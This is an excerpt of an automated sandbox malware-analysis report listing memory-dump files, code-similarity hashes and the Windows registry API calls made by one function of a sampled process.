                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                          • String ID: Software\Classes
                                                                                                          • API String ID: 2714550308-1656466771
                                                                                                          • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                          • Instruction ID: 77f1b81a972cbb77ae7b4a6deadf5f66b9816bd224ec033315eb692fbf98dccb
                                                                                                          • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                          • Instruction Fuzzy Hash: 6441D562A0A756C5EA02EB1DE445039A3A4FB44BD8FA28131DA1D437F5FF39D851C350
                                                                                                          Function 00007FF7AB14A0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB14A0FC
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D46E
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D485
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D4EE
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: iswspace.MSVCRT ref: 00007FF7AB12D54D
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D569
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D58C
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB14A1FB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                          • String ID: Software\Classes
                                                                                                          • API String ID: 2714550308-1656466771
                                                                                                          • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                          • Instruction ID: b61ef73253eb750bcec097d296d68ebf176054f4745c943fa7b0fdf9f6421546
                                                                                                          • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                          • Instruction Fuzzy Hash: C241D662A1A796C1EA02EB1DE444439A3A4FB45BD8F928131DE5D437F4EF39D881C350